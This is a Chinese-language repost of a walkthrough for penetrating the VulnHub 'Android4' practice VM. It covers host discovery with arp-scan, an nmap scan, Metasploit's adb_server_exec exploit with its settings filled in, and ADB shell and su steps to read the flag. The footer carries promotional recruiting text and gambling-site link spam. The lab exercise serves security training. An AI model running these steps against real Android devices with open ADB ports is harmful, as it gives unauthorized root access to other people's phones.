安基网 首页 资讯 安全报 查看内容

对vulnhub中Android4靶机渗透测试全过程!

2020-4-14 13:05| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: Android4靶机简介名称:Android4操作系统:Android v4.4标志:/data/root/(在此目录中)等级:初学者。下载链接:Android4:https://download.vulnhub.com/android4/Android4.ova搭建成功的Android平台知识点> 端口扫描和IP发现> 使用adb_server_exec攻击端口8080代理> 使用ADB连接到设备。> ...

Android4靶机简介

名称:Android4

操作系统:Android v4.4

标志:/data/root/(在此目录中)

等级:初学者。

下载链接:Android4:https://download.vulnhub.com/android4/Android4.ova

搭建成功的Android平台

知识点

  1. > 端口扫描和IP发现
  2. > 使用adb_server_exec攻击端口8080代理
  3. > 使用ADB连接到设备。
  4. > 使用metasploit。
  5. > 特权升级和找到答案

渗透过程

1:获取IP地址

使用命令:arp-scan -l

由此我们可以看到靶机的IP地址:192.168.232.146

2:扫描开放端口

在此扫描中,我们将使用最流行的工具nmap进行全端激进扫描

使用命令:nmap -p- -A 192。168。232。146

由此我确定存在与端口8080相关的某种网页。

没有任何延迟,我打开了网页,但什么也没找到。

大多数人都会确定使用POST方法涉及某种语言篡改。我也尝试过,但没有发现任何有用的东西。

在尝试了一些其他方法(PHP CLI和Dropbear RCE)之后,我发现了一种比较好的方法

关于PHP CLI的漏洞扫描:searchsploit -w php cli(关于searchsploit的使用方法:记一次在实战靶机中使用SearchSploit的总结)

我试过PHP CLI和Dropbear RCE之后发现Dropbear的扫描会得到有用的信息

Android Debug Bridge(adb)是一个多功能的命令行工具,可让您与设备进行通信(关于adb的使用方法:adb使用-详细教程(Awesome Adb))

adb命令可以促进各种设备操作,例如安装和调试应用程序,并且可以访问可用于在设备上运行各种命令的Unix shell。

它是一个客户端 - 服务器程序,包括三个组件

1:发送命令的客户端。客户端在您的开发计算机上运行。您可以通过发出adb命令从命令行终端调用客户端。

2:一个守护程序(adbd),它在设备上运行命令。守护程序在每个设备上作为后台进程运行。

3:服务器,用于管理客户端和守护程序之间的通信。服务器作为开发计算机上的后台进程运行。

如果您没有安装adb,可以通过sudo apt-get install adb安装它

sudo apt-get install abd

要启动ADB服务器,我们使用了metasploit:

首先:启动metasploit

msfconsole


地端口很可能不接受连接。在这种情况下,我们将默认端口从4444更改为3333

use exploit/android/adb/adb_server_execset RHOST 192.168.232.145set LHOST 192.168.232.146set LPORT 3333exploit


接下来就是需要使用adb

只要上面状态显示“正在连接到设备”,在新的终端窗口上键入命令:

adb connect 192.168.232.146:5555adb shell

我们查看一下密码:

并没有发现什么有用的内容

去defaullt目录:

suidls

在/data目录中,我们找到了一个名为“root”的文件夹

cd /datals

最后一步是成功得到答案:

cd /rootlscat flag.txt

点击关注我的头条号,0基础掌握更多黑客秘籍

私信回复‘’资料‘’领取更多技术文章和学习资料,加入专属的安全学习圈一起进步

安界

安界贯彻人才培养理念,结合专业研发团队,打造课程内容体系,推进实训平台发展,通过一站式成长计划、推荐就业以及陪护指导的师带徒服务,为学员的继续学习和职业发展保驾护航,真正实现和完善网络安全精英的教练场平台;

关注私信‘资料’

如果你想实现进高企、就高职、拿高薪,即使低学历也可实现职业发展中的第一个“弯道超车”!赶紧私信我!等你来!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6815114370704474631/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
福布斯彩票计划群 极速赛车正规吗 博发彩票计划群 江苏快三跨度走势图 全民彩票计划群 众彩票计划群 山东11选5走势 上海11选5走势 御都彩票计划群 永盛彩票计划群